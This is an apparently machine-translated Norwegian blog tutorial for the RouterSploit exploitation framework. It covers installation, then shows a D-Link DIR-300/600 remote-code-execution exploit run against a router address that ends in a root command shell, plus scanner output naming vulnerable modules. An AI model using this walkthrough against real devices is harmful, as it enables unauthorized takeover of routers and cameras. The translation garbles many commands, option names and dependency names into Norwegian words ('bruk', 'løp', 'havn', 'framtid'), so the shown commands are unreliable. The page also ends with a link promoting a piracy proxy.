Hjem » Linux-verktøy » RouterSploit – Fullstendig veiledning for utnyttelsesramme [2020]

RouterSploit – Fullstendig veiledning for utnyttelsesramme [2020]

routersploit

RouterSploit er et fantastisk utnyttelsesrammeverk laget spesielt for innebygde enheter.

Dette verktøyet kan brukes av pentester til å skanne sikkerheten til kameraer og rutere.

RouterSploit Høydepunkter:

  • Kodet i Python.
  • Kommandolinjegrensesnitt.
  • Docker-støtte.
  • Modulære verktøy.

Støttet OS:

  1. MacOS.
  2. Linux.
  3. Android-telefon.
  4. Windows.

Installerer RouterSploit:

Krav:

  • framtid
  • forespørsler
  • Paramic
  • stoppe
  • pycrypto

Valgfri:

  • blåaktig – bluetooth lavenergi

Installerer i Kali Linux:

Følg kommandoene nedenfor:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy-støtte:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installerer i Ubuntu:

Følg kommandoene nedenfor:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy-støtte:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installerer på MacOS:

Følg kommandoene nedenfor:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Installerer på Docker:

Følg kommandoene nedenfor:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Slik oppdaterer du RouterSploit?

Du må oppdatere RouterSploit ofte for å unngå ulemper.

Nye moduler sendes nesten hver dag.

cd routersploit
git pull

Slik bruker du RouterSploit?

Bruk

root@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \___/ __,_|\____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Utnyttelsesramme for    |_|   av Threat9
            Innebygde enheter
  
 Kodenavn   : Jeg visste at du var trøbbel
 Versjon    : 3.3.0
 Hjemmeside   : https://www.threat9.com/ - @threatnine
 Bli med Slack : routersploit.slack.com

 Bli med i Threat9 Beta-programmet - https://www.threat9.com/

 Utnytter: 128 Skannere: 4 Creds: 165 Generisk: 4 Nyttelast: 32 Kodere: 6

rsf >

Utnytter:

For å utføre utnyttingen, bare velg modulen og sett målet:

rsf > bruk utnyttelser/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > bruk exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

For å fullføre bruk tabulatortasten.

For å vise alternativer, typeshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > vis alternativer

Målalternativer:


   Navn Gjeldende innstillinger Beskrivelse                                
   ----       ----------------     -----------                                
   mål Måladresse f.eks. http://192.168.1.1     
   havn       80                   Målhavn

Brukrun ellerexploit kommando for å utnytte målet:

rsf (D-LINK DIR-300 & DIR-600 RCE) > løp
[+] Målet er sårbart
[*] Påkaller kommandosløyfe...
cmd > whoami
rot

For å angi alternativer:

rsf (D-LINK DIR-300 & DIR-600 RCE) > angi mål http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Det er mulig å sjekke om målet er sårbart for spesiell utnyttelse:

rsf (D-LINK DIR-300 & DIR-600 RCE) > sjekke
[+] Målet er sårbart

Løpeshow info for å vise informasjon om utnyttelsen.

Skanning etter sårbare mål:

Skannere lar deg raskt bekrefte om målet er sårbart for bruk.

Bruk de samme kommandoene for å vise/angi alternativer, og også å løpe.

rsf (D-Link skanner) > løp
[+] exploits/dlink/dwr_932_info_disclosure er sårbar
[-] exploits/dlink/dir_300_320_615_auth_bypass er ikke sårbar
[-] exploits/dlink/dsl_2750b_info_disclosure er ikke sårbar
[-] exploits/dlink/dns_320l_327l_rce er ikke sårbar
[-] exploits/dlink/dir_645_password_disclosure er ikke sårbar
[-] exploits/dlink/dir_300_600_615_info_disclosure er ikke sårbar
[-] exploits/dlink/dir_300_600_rce er ikke sårbar

[+] Enheten er sårbar!
- exploits/dlink/dwr_932_info_disclosure

Offisiell RouterSploit

Les også: 1337x proxy

Siste ord:

RouterSploit er et fantastisk verktøy å bruke.

Hvis du møter noen problemer angående RouterSploit. Sørg for å kommentere nedenfor. Teamet vårt CSHAWK vil ta kontakt med deg så fort som mulig.

Legg igjen en kommentar